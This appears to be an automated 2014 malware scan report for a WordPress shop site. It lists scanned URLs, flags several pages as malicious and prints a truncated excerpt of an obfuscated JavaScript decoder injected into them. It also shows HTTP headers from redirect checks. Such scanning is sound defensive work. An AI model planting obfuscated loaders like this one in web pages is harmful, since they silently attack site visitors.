Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=salon-gooddog.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://salon-gooddog.ru/ | 200 OK Content-Length: 37042 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931 Antivirus reports:
| ||
http://salon-gooddog.ru/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.12.1.55f8cfa0d7 | 200 OK Content-Length: 31068 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/index.php?wpsc_user_dynamic_js=true&ver=3.8.12.1.55f8cfa0d7 | 200 OK Content-Length: 1000 Content-Type: text/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.12.155f8cfa0d7 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js?t=CBDD&ver=3.7.4 | 200 OK Content-Length: 300539 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.utils.js?ver=3.7.4 | 200 OK Content-Length: 16591 Content-Type: application/javascript | clean |
http://salon-gooddog.ru/?page_id=47 | 200 OK Content-Length: 89802 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931 Antivirus reports:
| ||
http://salon-gooddog.ru/?page_id=16 | 200 OK Content-Length: 22171 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931 Antivirus reports:
| ||
http://salon-gooddog.ru/?page_id=91 | 200 OK Content-Length: 58547 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931 Antivirus reports:
| ||
http://salon-gooddog.ru/?feed=rss2 | 200 OK Content-Length: 1754 Content-Type: text/xml | clean |
http://salon-gooddog.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: salon-gooddog.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 02:30:20 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://salon-gooddog.ru/?p=5>; rel=shortlink
Set-Cookie: PHPSESSID=0b31b8fa802151397e1fdadc21d3db4b; path=/
Set-Cookie: wpsc_customer_cookie_74615c70fe92fff0cd4f3035e13b4968=_Gk%23Inx%5E2ao6%2A%7C1410057021%7C50644f06bf9d3b252d1358affaa3924b; expires=Sun, 07-Sep-2014 02:30:21 GMT; path=/; httponly
X-Pingback: http://salon-gooddog.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: salon-gooddog.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 02:30:20 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://salon-gooddog.ru/?p=5>; rel=shortlink
Set-Cookie: PHPSESSID=0b31b8fa802151397e1fdadc21d3db4b; path=/
Set-Cookie: wpsc_customer_cookie_74615c70fe92fff0cd4f3035e13b4968=_Gk%23Inx%5E2ao6%2A%7C1410057021%7C50644f06bf9d3b252d1358affaa3924b; expires=Sun, 07-Sep-2014 02:30:21 GMT; path=/; httponly
X-Pingback: http://salon-gooddog.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: salon-gooddog.ru
Referer: http://www.google.com/search?q=salon-gooddog.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: salon-gooddog.ru
Referer: http://www.google.com/search?q=salon-gooddog.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.